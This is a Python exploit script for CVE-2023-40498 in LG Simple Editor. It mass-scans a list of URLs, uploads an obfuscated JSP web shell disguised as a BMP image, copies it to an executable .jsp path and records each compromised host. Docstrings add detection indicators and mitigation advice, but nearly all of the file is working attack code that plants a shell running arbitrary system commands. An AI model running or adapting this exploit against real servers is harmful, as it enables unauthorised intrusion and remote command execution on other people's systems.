# 作者: VulnExpo
# 日期: 2023-11-17
import requests
import argparse
import threading
import string
import random
from urllib3.exceptions import InsecureRequestWarning
# Silences urllib3's InsecureRequestWarning. Every request issued below passes
# verify=False, so TLS certificates are never validated; the warning is hidden
# rather than the cause fixed.
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
def generate_random_string(length=5):
    """Return ``length`` lowercase ASCII letters drawn with ``random.choice``.

    Uses the non-cryptographic ``random`` module; the value only serves as a
    per-run file name, not as a secret.
    """
    alphabet = string.ascii_lowercase
    picked = [random.choice(alphabet) for _ in range(length)]
    return "".join(picked)
def check_for_vulnerability(url, proxies=None, success_file=None):
    """Probe one target for CVE-2023-40498 and append a hit to ``success_file``.

    Two requests are sent to ``url``: a multipart upload to
    ``/simpleeditor/imageManager/uploadImage.do`` whose ``uploadFile`` part is
    named ``<name>.bmp`` but carries JSP source, followed by a JSON POST to
    ``/simpleeditor/fileSystem/makeDetailContent.do`` with ``"command": "cp"``
    that copies ``/<name>_original.bmp`` to ``/<name>.jsp``. A target counts as
    vulnerable only when the second response is HTTP 200 and its JSON
    ``errorMessage`` equals ``"success"``.

    Args:
        url: Base URL of the target; the two paths are joined with plain ``+``,
            so a trailing slash on ``url`` produces ``//simpleeditor``.
        proxies: Accepted for signature compatibility; not referenced in this body.
        success_file: Path that is opened in append mode on success. The default
            ``None`` makes ``open()`` raise inside the ``try`` and is reported as
            an exception rather than a hit.

    Returns:
        True on a confirmed hit; False on any non-200 status, a non-success JSON
        body, or any exception (all exceptions are swallowed and printed).

    Defender notes, derived from the requests this function issues:
      * Detection: POSTs to ``uploadImage.do`` with ``uploadPath`` of ``/`` and
        an image part containing ``<%@ page`` / ``<%!``; JSON bodies to
        ``makeDetailContent.do`` with ``"command": "cp"`` and a ``destPath``
        ending in ``.jsp``; new ``*.jsp`` files beside ``*_original.bmp`` under
        the simpleeditor web root; pages titled ``Just For Fun`` containing
        ``Build By LandGrey``. On the scanning host, ``success_targets.txt``.
      * Mitigation: apply the vendor fix for CVE-2023-40498; require
        authentication on the upload and file-system endpoints; validate image
        content server-side; deny script execution in upload directories.
    """
    try:
        random_string = generate_random_string()
        # Request 1: multipart upload. The boundary is hard-coded in both the
        # Content-Type header and the body literal and must stay in sync.
        path1 = "/simpleeditor/imageManager/uploadImage.do"
        headers1 = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 14.0; rv:109.0) Gecko/20100101 Firefox/118.0',
                    'Content-Type': 'multipart/form-data; boundary=---------------------------819989449787154297538622041045'}
        # The literal is passed through str.format below, so every Java brace
        # is doubled ({{ }}) and only {file_name} is substituted.
        data1 = """-----------------------------819989449787154297538622041045\r\nContent-Disposition: form-data; name=\"uploadFile\"; filename=\"{file_name}.bmp\"\r\nContent-Type: image/bmp\r\nContent-Transfer-Encoding: binary\r\n\r\n<%@ page import="java.util.Scanner" pageEncoding="UTF-8" %>
<HTML><title>Just For Fun</title>
<BODY><H3>Build By LandGrey</H3>
<FORM METHOD=POST ACTION='#'> <INPUT name='q' type=text>
<INPUT type=submit value='Fly'>
</FORM><%!
public static String getPicture(String str) throws Exception{{
String fileSeparator =String.valueOf(java.io.File.separatorChar);
if(fileSeparator.equals("\\\\")){{
str = new String(new byte[] {{99, 109, 100, 46, 101, 120, 101, 32, 47, 67, 32}}) + str;
}}else{{
str = new String(new byte[] {{47, 98, 105, 110, 47, 98, 97, 115, 104, 32, 45, 99, 32}}) + str;
}} Class rt = Class.forName(new String(new byte[] {{ 106, 97, 118, 97, 46, 108, 97, 110, 103, 46, 82, 117, 110, 116, 105, 109, 101 }}));
Process e = (Process) rt.getMethod(new String(new byte[] {{ 101, 120, 101, 99 }}), String.class).invoke(rt.getMethod(new String(new byte[] {{ 103, 101, 116, 82, 117, 110, 116, 105, 109, 101 }})).invoke(null, new Object[]{{}}), new Object[] {{ str }}); Scanner sc = new Scanner(e.getInputStream()).useDelimiter("\\\\A");
String result = ""; result = sc.hasNext() ? sc.next() : result;
sc.close(); return result; }}%><% String name ="Input Nothing"; String query = request.getParameter("q"); if(query != null) {{ name = getPicture(query); }}%><pre><%= name %></pre></BODY></HTML>\r\n-----------------------------819989449787154297538622041045\r\nContent-Disposition: form-data; name=\"uploadPath\"\r\n\r\n/\r\n-----------------------------819989449787154297538622041045\r\nContent-Disposition: form-data; name=\"uploadFile_x\"\r\n\r\n-1000\r\n-----------------------------819989449787154297538622041045\r\nContent-Disposition: form-data; name=\"uploadFile_y\"\r\n\r\n-1000\r\n-----------------------------819989449787154297538622041045\r\nContent-Disposition: form-data; name=\"uploadFile_width\"\r\n\r\n1920\r\n-----------------------------819989449787154297538622041045\r\nContent-Disposition: form-data; name=\"uploadFile_height\"\r\n\r\n1080\r\n-----------------------------819989449787154297538622041045--"""
        data1 = data1.format(file_name=random_string)
        # verify=False: the server certificate is not checked on either request.
        response1 = requests.post(url + path1, data=data1, headers=headers1, verify=False)
        if response1.status_code == 200:
            # Request 2: server-side file-system command. The "_original" suffix
            # on srcPath implies the server stores uploads under that name —
            # inferred from this request, not confirmed here. Copying to .jsp is
            # presumably what lets the servlet container execute the upload; this
            # endpoint is the highest-value detection point.
            path2 = "/simpleeditor/fileSystem/makeDetailContent.do"
            data2 = {
                "command": "cp",
                "option": "-f",
                "srcPath": f"/{random_string}_original.bmp",
                "destPath": f"/{random_string}.jsp"
            }
            headers2 = {
                'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47',
                'X-Requested-With': 'XMLHttpRequest',
                'Accept': 'application/json',
                'Content-Type': 'application/json'
            }
            response2 = requests.post(url + path2, json=data2, headers=headers2, verify=False)
            # .json() is parsed twice; a non-JSON body makes it raise, which is
            # then swallowed by the generic except below.
            if response2.status_code == 200 and "errorMessage" in response2.json() and response2.json()[
                    "errorMessage"] == "success":
                print(f"目标URL: {url}")
                print(f"响应内容: {url}/simpleeditor/{random_string}.jsp#")
                # Host-side artifact: appended without any lock, so several
                # scanning threads may interleave their lines.
                with open(success_file, 'a') as s_file:
                    s_file.write(f"++++++++++++++++++\n")
                    s_file.write(f"目标URL: {url}\n")
                    s_file.write(f"响应内容: {url}/simpleeditor/{random_string}.jsp#\n\n")
                return True
            else:
                print("第二个请求失败")
                return False
        else:
            print("第一个请求失败")
            return False
    except Exception as e:
        # Broad catch: connection errors, JSON decode errors and the TypeError
        # from success_file=None all end here as a printed message and False.
        print(f"发生异常:{e}")
        return False
def scan_targets(targets, proxies=None, success_file=None):
    """Run ``check_for_vulnerability`` sequentially over ``targets``.

    Each entry is stripped of surrounding whitespace (including the newline
    left by ``readlines()``) before use. Return values are discarded; all
    reporting happens inside ``check_for_vulnerability``.
    """
    for raw_target in targets:
        check_for_vulnerability(raw_target.strip(), proxies, success_file)
def multi_threaded_scan(urls, proxies=None, success_file=None, num_threads=4):
    """Split ``urls`` round-robin over ``num_threads`` threads running ``scan_targets``.

    Thread ``i`` receives the slice ``urls[i::num_threads]``. All threads are
    created first, then started, then joined in order, so the call blocks until
    every slice has been processed. Nothing here serialises writes to
    ``success_file``.
    """
    workers = [
        threading.Thread(
            target=scan_targets,
            args=(urls[index::num_threads], proxies, success_file),
        )
        for index in range(num_threads)
    ]
    for worker in workers:
        worker.start()
    for worker in workers:
        worker.join()
if __name__ == '__main__':
    # CLI: one target via -u, or one target per line from -f (default url.txt).
    parser = argparse.ArgumentParser(description="LG Simple Editor 远程代码执行CVE-2023-40498")
    parser.add_argument("-u", "--url", help="目标URL")
    parser.add_argument("-f", "--file", default="url.txt", help="目标URL列表,默认为url.txt")
    parser.add_argument("-t", "--threads", type=int, default=4, help="线程数,默认为4")
    parser.add_argument("-p", "--proxy", help="代理服务器地址(例如:http://localhost:8080)")
    args = parser.parse_args()

    # --file has a default, so this only fires when both values are explicitly
    # empty (e.g. -f "").
    if not (args.url or args.file):
        print("请使用 -u 指定要扫描的目标URL或使用默认文件 url.txt。")
        exit(1)

    if args.url:
        urls = [args.url]
    else:
        # readlines() keeps trailing newlines; scan_targets strips them.
        with open(args.file, 'r') as file:
            urls = file.readlines()

    # Hits are appended to this fixed path in the current working directory.
    success_file = 'success_targets.txt'
    proxies = None
    if args.proxy:
        proxies = {"http": args.proxy, "https": args.proxy}
    multi_threaded_scan(urls, proxies, success_file, args.threads)
    print("扫描完成,成功的目标已保存到 success_targets.txt 文件中。")